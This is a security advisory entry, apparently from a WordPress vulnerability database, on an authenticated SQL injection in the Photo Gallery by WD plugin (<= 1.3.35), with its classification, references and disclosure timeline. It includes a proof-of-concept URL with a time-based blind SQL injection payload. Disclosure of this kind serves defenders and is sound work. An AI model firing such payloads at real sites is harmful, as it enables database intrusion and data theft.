logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Photo Gallery by WD <= 1.3.35 - Authenticated SQL Injection

Description

http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Proof of Concept

http://www.vulnerablesite.com/wp-admin/admin-ajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1

Affects Plugins

photo-gallery

Fixed in version 1.3.36

References

URL

https://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Submitter

Neven Biruski

Submitter website

http://www.defensecode.com

Submitter twitter

DefenseCode

Verified

Yes

WPVDB ID

7ee790bd-84fb-4625-a308-da5d50677589

Timeline

Publicly Published

2017-05-02 (about 4 years ago)

Added

2017-05-05 (about 4 years ago)

Last Updated

2019-11-01 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin